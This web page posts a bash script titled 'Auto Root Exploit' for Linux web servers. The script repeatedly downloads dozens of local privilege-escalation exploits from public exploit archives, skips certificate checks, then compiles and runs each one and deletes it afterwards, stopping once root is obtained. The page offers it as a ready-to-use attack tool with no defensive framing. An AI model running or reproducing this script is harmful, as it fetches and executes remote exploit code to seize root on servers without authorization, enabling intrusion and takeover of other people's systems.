Linux Web Server Auto Root Exploit

Linux Web Server Auto Root Exploit
[CODE]
#All exploits are suggested by "Linux Exploit Suggester" and will update according to it.
#Name : Auto Root #Author : Nilotpal Biswas
#Facebook : https://www.facebook.com/nilotpal.biswas.73
#Twitter : https://twitter.com/nilotpalhacker
#USAGE : bash autoroot.sh
echo "==================================================="
echo " Auto Root Exploit v1.0" echo " by Nilotpal Biswas"
echo "==================================================="
 checkroot() { if [ $(id -u) == 0 ];
then
echo
echo "Successfully R00T(ed).. have fun :)" id=$(id) echo "ID => " $id who=$(whoami) echo "WHOAMI => " $who exit else echo "" echo "R00Ting.. wait" sleep 1 fi } echo "Auto R00Ting start..." checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/744.c -O exploit.c gcc -O2 -fomit-frame-pointer exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2013.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/1397.c -O exploit.c gcc -o exploit exploit.c -static -O2 ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/160.c -O exploit.c gcc -O3 -static -fomit-frame-pointer exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15023.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2031.c -O exploit.c gcc exploit.c -o exploit -static -Wall ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2004.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2005.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2006.c -O exploit.c gcc exploit.c -o exploit -Wall ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/5092.c -O exploit.c gcc exploit.c -o exploit & gcc exploit.c -o exploit -static -Wno-format ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/5093.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/6851.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/14814.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15285.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/6851.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/17787.c -O exploit.c gcc exploit.c -o exploit -lrt ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15916.c -O exploit.c gcc -w exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15150.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/15024.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/18411.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/25444.c -O exploit.c gcc -O2 exploit.c ./a.out rm a.out && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/26131.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/lin_amd64/local/27297.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/31346.c -O exploit.c gcc exploit.c -o exploit ./exploit rm exploit && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/2011.sh -O exploit.sh bash exploit.sh rm exploit.sh && rm *.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/8369.sh -O exploit.sh bash exploit.sh rm exploit.sh && rm *.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/8478.sh -O exploit.sh bash exploit.sh rm exploit.sh && rm exploit.c checkroot; wget --no-check-certificate https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/12130.py -O exploit.py python exploit.py rm exploit.py && rm *.c checkroot; wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9436.tgz tar -xvf 9436.tgz bash run.sh rm run.sh && rm run.c && rm exploit.c && rm 9436.tgz checkroot; wget --no-check-certificate https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9435.tgz tar -xvf 9435.tgz cd wunderbar_emporium/ bash wunderbar_emporium.sh cd .. rm wunderbar_emporium & rm 9435.tgz checkroot; wget http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c -O exploit.c gcc exploit.c -lutil -lpthread ./a.out rm a.out && rm exploit.c checkroot; echo echo "Srry..:( I tried hard, but no luck this time.. Wait for update" [/CODE]

Github
Latest
Previous
Next Post »